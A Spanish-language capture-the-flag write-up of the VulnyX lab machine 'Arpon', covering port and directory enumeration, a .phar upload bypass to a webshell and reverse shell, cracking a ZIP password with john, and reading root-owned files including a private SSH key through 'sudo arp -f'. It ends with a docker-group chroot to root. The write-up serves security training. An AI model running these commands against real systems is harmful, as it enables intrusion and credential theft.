cd ~/blog

~/writeups/vulnyx/11-arpon.md

11 - Arpon

easy Linux vulnyx 13-02-2025
Unrestricted File Upload (phar bypass)ZIP password crackingsudo arp arbitrary file readdocker group Privesc
vulnyx.com

~1 min de lectura


Enumeramos puertos y directorios:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.108
 nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.108
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-13 12:49 -03
Nmap scan report for 192.168.1.108
Host is up (0.00036s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 e1:85:8b:7b:6d:a2:6b:1a:ed:18:8e:08:a0:90:87:2a (ECDSA)
|_  256 ad:fe:77:78:a0:57:70:cc:33:68:b5:84:26:a3:b3:63 (ED25519)
80/tcp open  http    Apache httpd 2.4.59 ((Debian))
|_http-server-header: Apache/2.4.59 (Debian)
|_http-title: Essex
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.76 seconds
 gobuster dir -u 'http://192.168.1.108' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,sql,png,xml,zip,sh,db -r
...
/index.html           (Status: 200) [Size: 2447]
/index.php            (Status: 200) [Size: 72614]
/backup               (Status: 200) [Size: 421]
/imagenes             (Status: 200) [Size: 1452]
...

 gobuster dir -u 'http://192.168.1.108/backup' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,sql,png,xml,zip,sh,db -r
...
/index.html           (Status: 200) [Size: 421]
/upload.php           (Status: 200) [Size: 17]
/empty                (Status: 200) [Size: 1]
...

En /backup hay un formulario de subida. La subida directa de .php falla, pero tras probar extensiones tenemos éxito con .phar. Los archivos se alojan en /backup/empty, así que accedemos a nuestra webshell para obtener una reverse shell como www-data:

 ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.108:44774.
bash: cannot set terminal process group (480): Inappropriate ioctl for device
bash: no job control in this shell
www-data@arpon:/var/www/html/backup/empty$

Listando con ls -la descubrimos un directorio oculto con un ZIP protegido por contraseña, que descargamos y crackeamos con john:

www-data@arpon:/var/www/html/backup/empty$ ls -la
...
drwxr-xr-x 2 www-data www-data 4096 May 13  2024 .hidden
...
 zip2john zip_files/backup_id.zip > zip_hash
 john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt zip_hash
...
swordfish        (backup_id.zip)
...

El ZIP contiene la clave id_rsa del usuario calabrote, con la que nos conectamos:

 ssh calabrote@192.168.1.108 -i id_rsa_calabrote
Linux arpon 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 13 17:58:26 2025 from 192.168.1.7
$

Para escalar privilegios, revisamos los permisos sudo:

calabrote@arpon:/tmp$ sudo -l
Matching Defaults entries for calabrote on arpon:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User calabrote may run the following commands on arpon:
    (root) NOPASSWD: /usr/sbin/arp

Podemos ejecutar arp como root, que con -f lee archivos. Lo usamos como lector arbitrario sobre el .bash_history de foque para descubrir un script de backup:

calabrote@arpon:/tmp$ sudo arp -v -f /home/foque/.bash_history
...
>> cat script_net_backup.sh
>> chmod 755 script_net_backup.sh
...

calabrote@arpon:/tmp$ sudo arp -v -f /home/foque/script_net_backup.sh
>> #!/bin/sh
>> cd /var/www/html
>> tar czf /tmp/backup.tar.gz
>> scp -i /home/foque/.ssh/id_rsa_foque_script /tmp/backup.tar.gz 10.1.1.1@foque:backups/
>> rm /tmp/backup.tar.gz

El script usa la clave id_rsa_foque_script, que también leemos con arp:

calabrote@arpon:/tmp$ sudo arp -v -f /home/foque/.ssh/id_rsa_foque_script
>> -----BEGIN OPENSSH PRIVATE KEY-----
...
>> -----END OPENSSH PRIVATE KEY-----

Tras formatear la clave, nos conectamos como foque y obtenemos la primera flag:

 ssh foque@192.168.1.108 -i id_rsa_foque
Linux arpon 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 13 09:50:04 2024 from 192.168.1.2
$

Revisamos los grupos de foque:

foque@arpon:~$ id
uid=1002(foque) gid=1002(foque) grupos=1002(foque),996(docker)

Pertenece al grupo docker (Privileged Groups Privesc), que permite montar el sistema de archivos del host en un contenedor y obtener root:

foque@arpon:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# whoami
root

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados